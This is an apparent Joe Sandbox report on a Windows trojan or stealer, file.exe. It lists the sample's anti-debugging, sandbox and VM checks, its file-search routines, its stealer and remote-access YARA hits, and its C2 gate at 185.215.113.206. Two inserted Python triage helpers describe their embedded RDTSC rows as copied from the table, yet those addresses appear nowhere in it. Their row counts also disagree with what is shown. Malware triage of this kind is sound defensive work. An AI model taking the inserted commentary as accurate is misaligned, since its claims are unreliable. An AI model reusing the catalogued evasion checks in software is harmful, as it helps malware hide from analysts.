                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54205B7 second address: 5420610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D25BAD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC41D25BACCh 0x00000011 sbb al, 00000018h 0x00000014 jmp 00007FC41D25BACBh 0x00000019 popfd 0x0000001a mov edx, ecx 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007FC41D25BAD5h 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420610 second address: 5420666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FC41CBA1046h 0x0000000b add ecx, 6DFF16D8h 0x00000011 jmp 00007FC41CBA103Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FC41CBA1046h 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC41CBA103Ah 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420666 second address: 542066A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542066A second address: 5420670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9DA66 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9D98B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C5E763 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CC18A6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38684
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007C40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007BE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007B1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007C47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007BF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007C4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007C3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007BDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007BBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007BEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007BDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B1160 GetSystemInfo,ExitProcess,0_2_007B1160
                Source: file.exe, file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareE
                Source: file.exe, 00000000.00000002.1319415153.00000000016B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQrU
                Source: file.exe, 00000000.00000002.1319415153.00000000016B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37516
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37499
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37496
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37511
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37551
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37385
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
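
The interceptor rows above record every pair of consecutive rdtsc executions the sandbox observed, together with the instructions executed between them. What the rows do not say is which of those readings can actually take part in a timing comparison. The following is an added example for this page (it is not Joe Sandbox code and not code from the sample): a parser for the row format plus a small register/stack model that decides, per row, whether the timestamp written by the first rdtsc (EDX:EAX) is still reachable when the second rdtsc runs. A reading that is immediately overwritten ("rdtsc; pop edx; pop eax") cannot feed a delta check and is protector filler; a reading saved to the stack ("rdtsc; push eax; push edx") can. The six embedded rows are copied from the table; the chain grouping and the simplified x86 model (pushad/popad register order, sub-register aliases, branches not followed) are the example's own assumptions.

```python
"""Triage helper for Joe Sandbox 'RDTSC instruction interceptor' rows.
Added example for this page; not Joe Sandbox code and not from the sample."""
import re

# Six interceptor rows copied from this report. The extracted page runs the
# Source cell into the signature text; the regex below does not care.
SAMPLE_ROWS = [
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1FD24 second address: D1FD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1FD28 second address: D1FD2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22785 second address: D227A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CBA1049h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D227A4 second address: D227E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FC41D25BADCh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FC41D25BAD2h 0x00000017 jg 00007FC41D25BAC6h 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D227E8 second address: D227F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007FC41CBA105Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D227F8 second address: D22802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC41D25BAC6h 0x0000000a rdtsc",
]

ROW_RE = re.compile(r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.*)$")
INSN_RE = re.compile(r"0x([0-9a-f]{8}) (.+?)(?= 0x[0-9a-f]{8}|$)")

# Register order pushed by pushad; popad restores in reverse and skips esp.
PUSHAD_ORDER = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SUBREG = {"al": "eax", "ah": "eax", "ax": "eax", "dl": "edx", "dh": "edx", "dx": "edx"}
WRITERS = {"mov", "add", "sub", "adc", "sbb", "xor", "or", "and", "lea", "inc", "dec", "neg", "not", "shl", "shr"}


def parse_row(row):
    """Split one interceptor row into its two addresses and an (offset, text) list."""
    m = ROW_RE.search(row)
    if not m:
        raise ValueError("not an RDTSC interceptor row")
    first, second, body = m.groups()
    insns = [(int(off, 16), text.strip()) for off, text in INSN_RE.findall(body)]
    if not insns or insns[0][1] != "rdtsc" or insns[-1][1] != "rdtsc":
        raise ValueError("row does not start and end with rdtsc")
    return {"first": first.upper(), "second": second.upper(), "insns": insns}


def reading_preserved(insns):
    """True if the timestamp from the leading rdtsc (EDX:EAX) is still held in a
    register or on the stack when the trailing rdtsc executes. Simplified model:
    values are symbolic, pops from an empty stack yield fresh unknowns, and
    branches are not followed (assumption of this example)."""
    regs = {r: r for r in PUSHAD_ORDER}
    regs["eax"], regs["edx"] = "ts_lo", "ts_hi"
    stack = []
    outer = iter(range(1 << 20))

    def pop():
        return stack.pop() if stack else f"outer{next(outer)}"

    for _, text in insns[1:-1]:            # skip the two rdtsc themselves
        op, _, args = text.partition(" ")
        ops = [a.strip() for a in args.split(",")] if args else []
        dst = SUBREG.get(ops[0], ops[0]) if ops else None
        if op == "push" and dst in regs:
            stack.append(regs[dst])
        elif op == "pop" and dst in regs:
            regs[dst] = pop()
        elif op == "pushad":
            stack.extend(regs[r] for r in PUSHAD_ORDER)
        elif op == "popad":
            for r in reversed(PUSHAD_ORDER):
                v = pop()
                if r != "esp":
                    regs[r] = v
        elif op == "pushfd":
            stack.append("eflags")
        elif op == "popfd":
            pop()
        elif op == "xchg" and len(ops) == 2 and dst in regs and ops[1] in regs:
            regs[dst], regs[ops[1]] = regs[ops[1]], regs[dst]
        elif op in WRITERS and dst in regs:
            regs[dst] = regs.get(ops[1], "other") if (op == "mov" and len(ops) == 2) else "other"
        # jumps and writes to other registers leave eax/edx alone
    live = set(regs.values()) | set(stack)
    return {"ts_lo", "ts_hi"} <= live


def chains(records):
    """Group rows whose second address is the next row's first address: one
    chain is one run of back-to-back timestamp readings."""
    out = []
    for r in records:
        if out and out[-1][-1] == r["first"]:
            out[-1].append(r["second"])
        else:
            out.append([r["first"], r["second"]])
    return out


def summarize(rows):
    records = [parse_row(r) for r in rows]
    runs = chains(records)
    return {
        "readings": len(records),
        "preserved": [reading_preserved(r["insns"]) for r in records],
        "chains": runs,
        "longest_chain": max(len(c) for c in runs),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_ROWS)
    for row, kept in zip(SAMPLE_ROWS, s["preserved"]):
        rec = parse_row(row)
        print(f"{rec['first']} -> {rec['second']}: {len(rec['insns'])} insns, "
              f"timestamp {'kept' if kept else 'discarded'}")
    print("chains:", s["chains"])
```

On the six embedded rows only the D1FD28 reading survives, and D22785 to D22802 is one chain of five readings; run over all 21 rows of the table this separates the protector's decoy rdtsc from the readings that can carry a measurement, which is where a breakpoint belongs when stepping the real check.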

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007B4610 VirtualProtect ?,00000004,00000100,00000000 | 0_2_007B4610
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_007C9BB0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C9AA0 mov eax, dword ptr fs:[00000030h] | 0_2_007C9AA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA | 0_2_007C7690
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_007C9790
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle | 0_2_007C98E0
                Source: file.exe, file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: #Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007F75A8 cpuid | 0_2_007F75A8
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_007C7D20
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_007C7B10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_007C79E0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007C7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_007C7BC0

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK matrix (numbers in parentheses are the per-technique signature counts for this sample; cells without a number are the matrix's fixed technique listing and had no matching signature)
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Command and Scripting Interpreter (2) | DLL Side-Loading (1) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Encrypted Channel (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Native API (12) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (33) | LSASS Memory | Security Software Discovery (641) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (2) | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (11) | Security Account Manager | Virtualization/Sandbox Evasion (33) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook |

 Process Injection (11) | NTDS | Process Discovery (13) | Distributed Component Object Model | Input Capture | Application Layer Protocol (12) | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | Account Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Obfuscated Files or Information (4) | Cached Domain Credentials | System Owner/User Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Software Packing (12) | DCSync | File and Directory Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading (1) | Proc Filesystem | System Information Discovery (334) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 47% | ReversingLabs | Win32.Trojan.Generic
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                Source | Detection | Scanner | Label
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe
                No contacted domains info
                Contacted URLs
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                URLs from memory and binaries
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php# | file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php=YV | file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php? | file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/.IE5 | file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/2O | file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phpZ | file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/ws | file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/aO | file.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
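
The URL rows above are strings carved from process memory: the same gate path appears several times with trailing bytes from adjacent memory (php#, php=YV, phpZ), and a few entries (/2O, /aO, /ws, /.IE5) are fragments rather than paths the sample requested. The following is an added example for this page (not Joe Sandbox code): it parses the fused rows exactly as the extracted page shows them, canonicalises each URL and emits a de-duplicated IoC set. The embedded rows are copied from the tables; the "16 hex characters + .php" gate shape is taken from this report's own C2 URL, and whether a short leftover path is residue remains a judgement the analyst makes, which is why such entries are reported separately rather than dropped.

```python
"""Normalise the URL rows of a Joe Sandbox report into an IoC set.
Added example for this page; not Joe Sandbox code."""
import re
from urllib.parse import urlsplit

# Rows copied from the two URL tables above, in the fused form the extracted
# page shows them: URL, then the memory-dump source (may be absent), then the
# Malicious flag.
SAMPLE_ROWS = [
    "http://185.215.113.206/6c4adf523b719729.phptrue",
    "http://185.215.113.206/true",
    "http://185.215.113.206/6c4adf523b719729.php#file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://185.215.113.206/6c4adf523b719729.php=YVfile.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://185.215.113.206/6c4adf523b719729.php?file.exe, 00000000.00000002.1319415153.00000000016BD000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://185.215.113.206file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmptrue",
    "http://185.215.113.206/.IE5file.exe, 00000000.00000002.1319415153.00000000016A6000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://185.215.113.206/2Ofile.exe, 00000000.00000002.1319415153.0000000001699000.00000004.00000020.00020000.00000000.sdmpfalse",
    "http://185.215.113.206/6c4adf523b719729.phpZfile.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpfalse",
    "https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1261156514.00000000052BB000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmpfalse",
]

# URL (no spaces) + optional "file.exe, ...sdmp" source + true/false at the end.
ROW_RE = re.compile(r"^(https?://\S*?)((?:file\.exe.*?)?)(true|false)$")
# Gate path shape seen in this report's C2 URL: 16 hex characters + .php.
GATE_RE = re.compile(r"^/[0-9a-f]{16}\.php")


def parse_row(row):
    """Split a fused table row into url / source / malicious; None if it is not one."""
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    url, source, flag = m.groups()
    return {"url": url, "source": source.strip(), "malicious": flag == "true"}


def canonical(url):
    """Return (canonical_url, kind): 'gate' for the <16 hex>.php path with any
    trailing residue cut off, 'host' for a bare host, 'other' for anything else
    (a real path such as the docs.rs link, or a fragment such as '/2O')."""
    p = urlsplit(url)
    base = f"{p.scheme}://{p.netloc}"
    m = GATE_RE.match(p.path)
    if m:
        return base + m.group(0), "gate"
    if p.path in ("", "/"):
        return base + "/", "host"
    return url, "other"


def extract_iocs(rows):
    """De-duplicated IoC set: C2 gates, hosts the report flagged malicious,
    every host seen, and the URLs that need a human decision."""
    gates, mal_hosts, hosts, other = set(), set(), set(), set()
    for row in rows:
        rec = parse_row(row)
        if rec is None:
            continue
        url, kind = canonical(rec["url"])
        host = urlsplit(rec["url"]).netloc
        hosts.add(host)
        if rec["malicious"]:
            mal_hosts.add(host)
        if kind == "gate":
            gates.add(url)
        elif kind == "other":
            other.add(url)
    return {
        "c2_gates": sorted(gates),
        "malicious_hosts": sorted(mal_hosts),
        "all_hosts": sorted(hosts),
        "other_urls": sorted(other),
    }


if __name__ == "__main__":
    for key, values in extract_iocs(SAMPLE_ROWS).items():
        print(key)
        for v in values:
            print("  ", v)
```

Nine memory-carved rows collapse to one gate URL and one malicious host; the docs.rs link is a crate documentation URL embedded in the binary and stays in the "other" bucket with the fragments, where the analyst discards it rather than blocking it.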
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1546042
                                      Start date and time:2024-10-31 12:17:06 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 32s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed:15
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 80%
                                      • Number of executed functions: 20
                                      • Number of non-executed functions: 133
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
